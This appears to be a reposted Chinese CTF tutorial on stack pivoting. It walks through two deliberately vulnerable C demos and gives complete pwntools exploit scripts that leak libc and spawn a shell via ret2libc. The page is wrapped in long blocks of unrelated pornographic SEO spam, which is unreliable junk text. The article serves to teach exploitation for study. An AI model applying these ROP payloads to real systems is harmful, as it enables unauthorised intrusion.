精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

關于棧遷移的那些事兒

開發 前端
在筆者看來棧遷移的原理其實可以總結為一句話:因為棧溢出字節過少所以劫持rsp?寄存器指向攻擊者提前布置好payload?的內存地址,已達到擴充溢出字節數的目的。?

一、前言

現在的CTF比賽中很難在大型比賽中看到棧溢出類型的賽題,而即使遇到了也是多種利用方式組合出現,尤其以棧遷移配合其他利用方式來達到組合拳的效果,本篇文章意旨通過原理+例題的形式帶領讀者一步步理解棧遷移的原理以及在ctf中的應用。

二、前置知識

在筆者看來棧遷移的原理其實可以總結為一句話:因為棧溢出字節過少所以劫持rsp寄存器指向攻擊者提前布置好payload的內存地址,已達到擴充溢出字節數的目的。 以一個簡單的demo1為例,程序源碼以及編譯指令如下所示:

#include <stdio.h>

char buf1[0x100];

void main() {
char buf2[0x40];
puts("First: ");
read(0, buf1, 0x100);
puts("Second: ");
read(0, buf2, 0x60);

}
// gcc -fno-stack-protector -no-pie -z lazy -o demo1 demo1.c

程序的流程非常簡單存在兩個輸出,第一次是往全局變量buf1第二次是往局部變量buf2中寫入。可以看到在第二次寫入時存在明顯的棧溢出漏洞,但是溢出的字節數只夠寫入0x18大小的字節,如果要構造gadget泄露內存地址,最短的ROP鏈也需要0x20的字節才可以在泄露內存后返回輸入點繼續執行程序。

image-20220726104834218.png

在這種情況就可以使用棧遷移的方式來擴大溢出字節數的大小,在前面說過棧遷移的本質就是劫持rsp寄存器指向攻擊者提前布置好payload的內存地址,而劫持rsp寄存器的指令有很多,最常用的就是函數的退棧返回指令leave; ret。 可以分成兩部分來理解這條指令。首先執行的是leave指令,這條指令共執行了兩個操作mov rsp, rbp和pop rbp,其中rsp寄存器的指向變化如下圖所示,可以看到在執行完leave指令后rsp寄存器指向了返回地址;隨后會執行ret指令,這條指令可以理解成pop rip。因為此時rsp寄存器指向rbp+8即函數的返回地址,所以pop給rip寄存器的就是函數的返回地址,退棧完成。

image-20220726110625946.png

在了解這條指令后不難發現,如果利用溢出漏洞可以覆蓋rbp的值為一個已知地址,那么在執行過兩次leave; ret指令后,就可以劫持rsp寄存器到任意地址,此時rsp寄存器指向的地址即為新的棧地址,只要事先在新地址處布置好想要執行的rop gadget,那么溢出字節過少這個問題就迎刃而解了。

image-20220726115139278.png

根據上面介紹的棧遷移原理,可以總結出使用棧遷移的一些必要條件

  • 存在可以劫持程序流和控制rbp寄存器的漏洞
  • 攻擊者可以確定準確某一塊具有讀寫權限的地址
  • 在進行棧遷移前需要在這塊地址上進行rop gadget?布局

三、例題講解

3.1 例題demo1

在理解了棧遷移的原理后可以通過這個demo來練練手了,進行編譯時未開啟Canary和PIE保護,NX保護開啟防止寫入shellcode

image-20220726150444213.png

這里先將大體的利用思路總結出來,其中的實現細節實現會在下文中進行說明。

  • 未開啟PIE?保護,可以確定第一次寫入的地址記作addr1?,在此地址處布置rop gadget?來實現泄露LIBC地址并返回主函數
  • 利用第二次寫入存在的棧溢出漏洞覆蓋rbp為addr1,rip?為指令leave; ret的地址實現棧遷移
  • 返回主函數后利用ret2libc?執行system("/bin/sh")獲取shell

3.1.1 棧遷移布局

首先我們利用第一次輸入進行rop chain布局,并利用第二次棧溢出漏洞覆蓋rbp為偽棧地址劫持rip為leave; ret指令地址,內存變化如下圖所示。 細心的同學會發現,我們在第一次進行rop chain布局前有一小段padding填充在前面,這是因為在我們進行棧遷移后,程序指令中所有對于棧的操作都會在偽棧內進行,而偽棧地址與got表地址相鄰,填入這小段padding的目的就是為了避免程序在對偽棧進行讀寫數據時造成內存數據段內關鍵信息被覆蓋,從而造成crash現象。

image-20220726204247032.png

在匯編中當我們要對局部變量進行操作時,一般都是用rbp棧底寄存器來定位,如下圖所示。這一點在棧遷移中可以讓我們構造出一個類似于鏈表的利用結構,每次布置rop chain時不斷將rbp寄存器賦值為偽棧地址,然后跳轉到主函數的寫入函數處,因為局部變量尋址是通過rbp寄存器,所以我們可以不斷進行rop chain的布局。 在第一次進行rop chain的布局中控制rbp寄存器指向新的偽棧地址,那么在返回主函數后執行read函數時,寫入地址就是新的偽棧地址,這時只要利用棧溢出漏洞去構造ret2libc即可getshell。

image-20220726211402916.png

3.1.2 EXP

from pwn import *

p = process('./demo1')
libc = ELF('./demo1').libc

fake_stack = 0x601060
leave_ret = 0x40058E
puts_plt = 0x400430
puts_got = 0x601018
pop_rdi = 0x4005f3
read_text = 0x400572

payload1 = "a"*0x78+p64(fake_stack+0x408)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(read_text)
p.sendafter('First:', payload1)
payload2 = 'a'*0x40+p64(fake_stack+0x78)+p64(leave_ret)
p.sendafter('Second:', payload2)

puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
libc_base = puts_addr - libc.sym['puts']
system = libc_base+libc.sym['system']
sh = libc_base+libc.search('/bin/sh').next()
success(hex(libc_base))

payload3 = "a"*0x48+p64(pop_rdi)+p64(sh)+p64(system)
p.send(payload3)
p.interactive()

3.2 例題demo2

在CTF比賽中通常只有一次寫入機會,這邊給出demo2的源碼以及編譯命令。

# include <stdio.h>
# include <string.h>
void main() {
char buf[0x28];
puts("Hello Hacker.");

read(0, buf, 0x40);
}
// gcc -fno-stack-protector -no-pie -z lazy -o demo2 demo2.c

與demo1一樣demo2未開啟Canary與PIE保護,不同的是demo2中只有一次輸入機會,并且溢出字節數只能覆蓋返回地址。 結合之前講解的棧遷移技巧,首先在劫持rsp前需要進行rop chain布局,程序并沒有一次可以往偽棧布局的機會,但是可以利用劫持程序流的方式來構造這一條件。 觀察程序的匯編代碼如下圖所示,在對局部變量buf進行尋址時使用了rbp寄存器,那么我們可以利用這一點配合棧溢出漏洞來實現偽棧上的rop布局。利用思路如下所示,其中的實現細節實現會在下文中進行說明。

  • 利用棧溢出漏洞劫持rbp?寄存器為偽棧地址,返回地址為0x40054b?(圖中主程序的輸入函數),即可在返回主程序后對偽棧進行rop chain的布局
  • 對偽棧進行rop chain的布局,泄露LIBC地址并返回主函數
  • 返回主函數后利用棧溢出漏洞配合棧遷移+ret2libc完成getshell

image-20220726221209703.png

3.2.1 偽棧rop布局

第一次leave; ret是主函數退棧時執行的,利用棧溢出漏洞覆蓋rbp為偽棧地址,rsp為主函數地址。當我們再次來到主函數的輸入函數時即可在偽棧上布置rop chain。此時的內存變化如下圖所示

image-20220726224554713.png

第二次leave; ret指令依然來自主函數退棧時執行,在偽棧上布置好rop chain后程序執行退棧操作,此時rbp寄存器內保存fack_stack-0x30的地址即rop chain地址+0x8的位置處,rsp寄存器被劫持到偽棧上,此時的內存變化如下圖所示

image-20220726225131346.png

這里為什么是fake_stack-0x30的地址呢?因為在對局部變量buf進行尋址時使用到rbp寄存器,而本題中的buf地址來自[rbp-0x30]的地址,所以如果想要將rsp劫持到rop chain的位置,就需要對rbp寄存器賦值為fakc_stack-0x30,那么在執行第三次leave的時候,rsp寄存器就劫持到rop chain的地址處,此時的內存變化如下圖所示

image-20220726234500873.png

image-20220726225629456.png

泄露完LIBC地址后,劫持程序流返回主函數,利用read函數對偽棧進行最后一次rop布局,需要注意此時的寫入地址是fake_stack-0x30,所以在棧遷移時rbp寄存器的值為fake_stack-0x30-0x30-0x8的地址處,再執行一次leave; ret時即可將rsp寄存器劫持到ret2libc rop地址處。內存變化如下圖所示

image-20220726233002327.png

3.2.2 EXP

from pwn import *
context.log_level = 'debug'

p = process('./demo1')
libc = ELF('./demo1').libc

read_text = 0x40054B
fake_rbp = 0x601500
pop_rdi = 0x4005d3 # pop rdi; ret;
puts_plt = 0x400430
puts_got = 0x601018
leave_ret = 0x400567

# gdb.attach(p, 'b *0x400567')

payload1 = 'a'*0x30+p64(fake_rbp)+p64(read_text)
p.sendafter("Hello Hacker.", payload1)

payload2 = p64(fake_rbp-0x30)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(read_text)+p64(0)+p64(fake_rbp-0x30)+p64(leave_ret)
p.send(payload2)

puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
libc_base = puts_addr - libc.sym['puts']
system = libc_base+libc.sym['system']
sh = libc_base+libc.search('/bin/sh').next()
success(hex(libc_base))

payload3 = p64(pop_rdi)+p64(sh)+p64(system)+p64(0)*3+p64(fake_rbp-0x68)+p64(leave_ret)
p.send(payload3)
p.interactive()


責任編輯:武曉燕 來源: FreeBuf.COM
相關推薦

2021-04-29 10:30:58

MySQL數據遷移

2022-06-02 08:42:15

Redis數據庫

2017-04-12 12:31:14

緩存Web瀏覽器

2017-03-31 09:24:53

AR現實游戲

2012-11-28 10:54:37

禁止追蹤DNT

2020-09-22 14:29:24

智能

2020-05-07 10:05:52

Python數據安全

2014-03-12 09:23:06

DevOps團隊合作

2020-05-06 16:47:08

線程安全Python數據安全

2018-03-01 15:34:20

數據科學面試招聘

2022-07-10 07:48:26

緩存軟件設計

2022-06-04 11:12:12

RPCREST協議

2021-08-16 05:39:33

云計算云計算環境信創云

2016-08-31 10:55:30

螞蟻金服前端

2022-05-08 17:53:38

Nacos服務端客戶端

2023-04-11 07:34:40

分布式系統算法

2021-03-18 09:01:53

軟件開發軟件選型

2024-05-27 08:03:46

2018-03-15 08:50:46

Hive-數據存儲

2018-04-12 16:47:54

新零售
點贊
收藏

51CTO技術棧公眾號

青青在线免费观看视频| 久久免费一区| 免费观看一级视频| 亚洲黄色录像| 欧美精品一卡二卡| 日本中文字幕网址| 日本成人网址| 99久久久精品免费观看国产蜜| 日本精品一区二区三区在线| 久久久久久视频| 偷拍亚洲色图| 欧美一区二区成人| 国产成人无码av在线播放dvd| 麻豆网站在线看| 91麻豆国产香蕉久久精品| 国产精品视频地址| 日韩乱码在线观看| 国产精品久久久乱弄 | 中文字幕在线观看第三页| 3d玉蒲团在线观看| 国产精品无遮挡| 久久99欧美| 国产suv精品一区二区69| 久久久精品午夜少妇| 欧美日韩国产123| 天天爽天天爽天天爽| 日韩伦理一区二区三区| 精品国产一区二区三区av性色 | 国产精品亚洲专一区二区三区 | 久久综合色天天久久综合图片| 成人免费大片黄在线播放| 四虎影院在线免费播放| 伊人久久综合| 精品中文字幕在线| 黄色片网站在线播放| 伊人久久大香线蕉无限次| 日韩视频中午一区| 污免费在线观看| 美女视频一区| 欧美日韩精品综合在线| 能在线观看的av网站| 99re6在线精品视频免费播放| 亚洲人成亚洲人成在线观看图片 | 欧美一区二区三区久久精品茉莉花 | 一区二区三区在线免费观看| 国产成年人在线观看| 欧洲日本在线| 国产精品福利影院| 亚洲一二区在线| jizz在线观看中文| 欧美国产丝袜视频| 午夜精品亚洲一区二区三区嫩草| 可以在线观看的av网站| 久久久久久久一区| 日韩一二三区不卡在线视频| 蜜桃视频在线播放| 国产亚洲精品精华液| 日本一区免费在线观看| 国产精品一区二区三区四区色| 久久久久久亚洲综合影院红桃| 欧美精品久久久| 成人亚洲综合天堂| **性色生活片久久毛片| 欧美 国产 精品| 日本在线视频中文有码| 亚洲第一精品在线| 久久综合色视频| 美女100%一区| 欧美三级欧美一级| 中文字幕在线观看日| 国产一区二区在线观| 日韩免费视频线观看| 日本少妇xxxx| 国产精品一国产精品| 视频在线观看99| www.xxxx日本| 亚洲麻豆一区| 国产精品嫩草影院久久久| 一区不卡在线观看| 国产99久久久国产精品免费看| 国产精品国色综合久久| 青青操在线视频| 国产精品护士白丝一区av| av中文字幕av| 天堂电影一区| 欧美日本一道本| 亚洲成a人片在线www| 夜夜春成人影院| 久久久999精品视频| 国产午夜福利一区二区| 日韩中文字幕一区二区三区| 亚洲精品免费一区二区三区| 色wwwwww| 亚洲视频 欧洲视频| 免费在线a视频| 一级欧美视频| 日韩高清免费在线| 天海翼在线视频| 美女91精品| 亚洲自拍在线观看| 精品影院一区| 亚洲国产精品久久久男人的天堂 | 91福利精品在线观看| 日韩视频免费观看高清完整版在线观看 | 精品国产一区探花在线观看 | 亚洲永久一区二区三区在线| 第四色日韩影片| 欧美日韩免费观看一区二区三区| 污污内射在线观看一区二区少妇| 欧美电影三区| 日本精品va在线观看| 99草在线视频| 国产日韩精品一区二区浪潮av| 成人免费在线视频播放| 电影一区电影二区| 日韩精品中文字幕视频在线| 丝袜 亚洲 另类 欧美 重口| 日本不卡一区二区三区高清视频| 国产偷国产偷亚洲高清97cao| 欧美性videos| 欧美在线观看视频一区二区三区| 亚洲精品无码一区二区| 91精品久久久久久久蜜月| 国产不卡av在线| 五月天丁香视频| 亚洲精品一二三区| 日韩一区二区三区不卡视频| 亚洲动漫精品| 97视频国产在线| www.国产免费| 亚洲男女一区二区三区| 色一情一区二区三区| 日本道不卡免费一区| 日韩美女在线播放| 污视频在线免费| 亚洲a一区二区| 午夜影院福利社| 极品av少妇一区二区| 亚洲伊人久久大香线蕉av| 麻豆av在线导航| 欧美日韩亚洲高清一区二区| 日本高清黄色片| 天堂在线一区二区| 日本黑人久久| 婷婷综合六月| 一本色道久久综合狠狠躁篇怎么玩| 亚洲国产成人精品女人久久| 26uuu亚洲| 国产男女激情视频| 成人久久综合| 国产欧美日韩中文字幕| 麻豆视频在线免费观看| 91精品国产91热久久久做人人 | 亚洲aa在线观看| 成年视频在线观看| 欧美一级国产精品| 久久精品www人人爽人人| 成人激情小说网站| www.射射射| 亚洲美女15p| 国产精品久久久久久网站| 欧美精品日韩少妇| 日韩免费视频一区二区| xxxx 国产| 久久久久久久综合色一本| www.涩涩涩| 国产大片一区| 国产福利一区二区三区在线观看| missav|免费高清av在线看| 日韩国产在线看| 无码日韩精品一区二区| 中文字幕在线不卡| 欧美熟妇精品一区二区| 免费看黄裸体一级大秀欧美| 亚洲精品永久www嫩草| 99er精品视频| 97热精品视频官网| 成人av毛片| 日韩写真欧美这视频| 成人精品在线看| 中文一区一区三区高中清不卡| 亚洲天堂av一区二区| 影音先锋亚洲一区| 秋霞在线观看一区二区三区| 亚洲日本中文| 欧美一二三视频| 午夜在线视频播放| 亚洲成人激情视频| 久久这里只有精品9| 一区二区三区在线观看动漫| 国产呦小j女精品视频| 毛片av中文字幕一区二区| 黄色a级片免费看| 俺要去色综合狠狠| 肥熟一91porny丨九色丨| 中文字幕在线视频久| 久久国产精品首页| 精品999视频| 日韩久久久精品| 国产精品成人久久久| 亚洲成av人综合在线观看| 国产三级在线观看完整版| 成人夜色视频网站在线观看| 日韩av卡一卡二| 亚洲欧美bt| 屁屁影院ccyy国产第一页| 精品国产精品| 狠狠色噜噜狠狠色综合久| 婷婷久久免费视频| 欧美又大又硬又粗bbbbb| 18av在线视频| 最近2019免费中文字幕视频三| 色婷婷av一区二区三区之e本道| 欧美日韩亚洲另类| 国产亚洲欧美日韩高清| 精品av在线播放| 久久久久久久福利| 亚洲欧洲精品一区二区三区| 成人性生交大免费看| 波多野结衣在线aⅴ中文字幕不卡| 亚洲视频第二页| 欧美一级网站| 黄页免费在线观看视频| 欧美精品成人| aaa免费在线观看| 日韩久久精品网| 日韩视频在线播放| 国产99亚洲| 欧美另类高清视频在线| 老牛精品亚洲成av人片| 99re国产| 99精品国产一区二区三区2021| 国产欧美最新羞羞视频在线观看| 欧美大片1688网站| 国产成人涩涩涩视频在线观看| а√天堂中文资源在线bt| 欧美黑人性视频| 久操视频在线观看| 久久精品一区中文字幕| 91xxx在线观看| 色爱av美腿丝袜综合粉嫩av| 91网在线播放| 日韩在线视频免费观看高清中文| 国产天堂素人系列在线视频| 亚洲视频一区二区| 成年女人的天堂在线| 在线看福利67194| 在线观看免费黄视频| 日韩在线视频网| 91精品久久久久久粉嫩| 色综合久久精品亚洲国产| 欧美野外wwwxxx| 久久久欧美一区二区| 国产盗摄——sm在线视频| 午夜精品视频在线| 午夜影院在线观看国产主播| 青青久久aⅴ北条麻妃| 偷拍中文亚洲欧美动漫| 国产精品久久久久久av福利软件| 亚洲www啪成人一区二区| 国产精品视频专区| 精品国产一区二区三区2021| 99热国产免费| 日韩av中文字幕一区| 欧美日韩国产一二| 欧美a级片视频| 超碰人人爱人人| 99热免费精品| chinese少妇国语对白| 久88久久88久久久| 91人人澡人人爽| 91麻豆精东视频| 91香蕉视频污在线观看| 亚洲精品中文在线观看| 日本三级小视频| 欧美绝品在线观看成人午夜影视| www.午夜激情| 亚洲视频视频在线| 91黄色在线| 国产成人精品一区二区在线| 9999精品视频| 精品999在线观看| 日韩www.| 人妻av中文系列| 美美哒免费高清在线观看视频一区二区| 特级西西444www| 91蜜桃网址入口| 日本高清不卡免费| 欧美日韩中文字幕在线| 中文字幕有码无码人妻av蜜桃| 日韩色在线观看| 国产三级在线观看| 久久99精品久久久久久青青91| 天堂av在线| www.久久久| 青青草原综合久久大伊人精品| 亚洲中文字幕无码一区二区三区| 久久成人一区| 久久久久久久久久久影视| 国产香蕉久久精品综合网| 久久丫精品久久丫| 在线观看视频欧美| 免费a级片在线观看| 日韩中文字幕不卡视频| 性欧美18~19sex高清播放| 亚洲www视频| 青青草国产免费一区二区下载| 免费成人午夜视频| 国产福利91精品| 国产小视频你懂的| 色综合久久久久久久| 性猛交xxxx乱大交孕妇印度| 中文欧美日本在线资源| 天堂网在线最新版www中文网| 91精品国产综合久久久久久丝袜| 成人激情诱惑| 可以在线看的黄色网址| 丁香婷婷综合网| 国产精品免费人成网站酒店| 欧美性一二三区| 国模精品一区二区| 欧美又大又粗又长| 欧美wwwsss9999| 人人干视频在线| 粉嫩av亚洲一区二区图片| 欧美做爰爽爽爽爽爽爽| 日本福利一区二区| 日韩私人影院| 78m国产成人精品视频| 亚洲精品视频一二三区| 老汉色影院首页| 老司机精品视频导航| 亚洲黄色网址大全| 欧洲视频一区二区| 国产乱子伦三级在线播放| 8050国产精品久久久久久| 久久97精品| 日本免费黄视频| 91在线免费视频观看| 五月天婷婷网站| 精品av综合导航| 日韩av影片| 欧美久久综合性欧美| 三级不卡在线观看| 公侵犯人妻一区二区三区| 色综合久久久久| 岛国在线视频免费看| 国产精品免费小视频| 日韩精品影视| 青青草久久伊人| 伊人一区二区三区| 午夜精品久久久久久久99热黄桃 | 日韩成人av在线播放| 国产白浆在线免费观看| 久久精品五月婷婷| 香蕉久久夜色精品| 国产成人福利在线| 欧美日韩一区二区三区在线看 | 中文字幕一二三区| 一区二区三区蜜桃网| 丰满肉嫩西川结衣av| 国产91精品黑色丝袜高跟鞋 | www.69av| 成人国产精品免费网站| 九一国产在线观看| 伊是香蕉大人久久| 日韩精品中文字幕吗一区二区| av动漫在线免费观看| 99久久国产免费看| 中国a一片一级一片| 久久在线精品视频| 国产伦理久久久久久妇女 | 99国产精品久久| 日韩免费av网站| 久久天堂av综合合色| 精品综合久久88少妇激情| 亚洲精品无码久久久久久| 国产精品麻豆一区二区| 亚洲xxx在线| 国产极品jizzhd欧美| 亚洲先锋影音| 亚洲第一香蕉网| 欧美一区二区三区在| 免费成人在线电影| 一区二区三区免费看| 波多野结衣亚洲一区| 中文字幕在线一| 性欧美xxxx| 88国产精品视频一区二区三区| 污片免费在线观看| 欧美理论片在线| 小草在线视频免费播放| 91社在线播放| 91网站最新网址| 国产人妖一区二区| 国产精品第一区| 99xxxx成人网| 国模无码国产精品视频| 国产亚洲欧美一区| 国内精品国产成人国产三级粉色|